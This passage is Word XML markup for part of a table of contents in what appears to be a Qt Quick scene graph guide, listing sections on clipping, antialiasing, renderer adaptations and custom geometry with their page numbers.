            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605463 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>218</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64" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transform Nodes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605464 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>219</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65" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Clipping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605465 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>219</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66" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Vertex Buffers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605466 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>220</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467" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Antialiasing</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605467 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>220</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605468" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Vertex Antialiasing</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605468 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>220</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605469" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Multisample Antialiasing</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605469 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>221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70" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Performance</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605470 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>221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71" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visualizing</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605471 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>222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72" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visualizing Batches</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605472 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>224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73" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visualizing Clipping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605473 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>224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74" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visualizing Changes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605474 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>224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75" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visualizing Overdraw</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605475 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>225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76" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph Adaptations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605476 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>225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77" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Switching between the adaptation used by the application</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605477 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>226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78" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OpenGL ES 2.0 and OpenGL 2.0 Adaptation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605478 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>226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79" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Software Adaptation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605479 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>226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80" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Direct3D 12 (experimental)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605480 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>226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81" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph - Custom Geometry</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605481 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>227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82" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BezierCurve Declaration</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605482 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>227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83" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BezierCurve Implementation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605483 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>228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84" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Application Entry-Point</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605484 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>231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85" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the Item</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605485 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>232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86" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t>Scene Graph - Simple Material</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605486 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>233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87" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t>Scene Graph - OpenGL Under QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605487 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>239</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488" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
